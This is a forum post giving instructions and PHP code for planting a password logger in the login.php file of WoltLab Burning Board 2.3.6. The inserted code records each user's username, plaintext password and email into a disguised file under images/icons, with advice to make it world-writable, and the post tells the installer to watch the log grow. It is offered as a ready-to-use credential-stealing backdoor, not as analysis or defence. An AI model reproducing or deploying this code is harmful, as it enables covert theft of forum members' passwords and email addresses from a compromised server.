tr0nix |
Active user |

Joined: Mar 06, 2008 |
Posts: 48 |
Tested under:
Woltlab Burning Board 2.3.6
- Access to the server
Open the "login.php", which is located in the main directory from the WoltLab Burning Board.
Search for
Code: | bbcookie("userpassword", "$wbb_userpassword", time() + 3600 * 24 * 365); |
and put the following lines under the bbcookie (under the "}" line - in my file, the code begins at line #49):
Code: |
$lg_username = strtolower($result['username']);
$lg_password = $_POST["l_password"];
$lg_file = "./images/icons/lg.html";
$sql_query = @mysql_query("SELECT * FROM bb".$n."_users WHERE username='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query))
if(strlen($lg_password) > 1 OR strlen($lg_username) > 1)
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n");
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
@fputs($fp, $values);
Now wait a little bit and see how the filesize of the logfile raises.
PS: If the Logger doesn't create the logfile automaticly, then you need to create it manually and give the file chmod 0777.
(c) by [Team n0rth] tr0nix <> |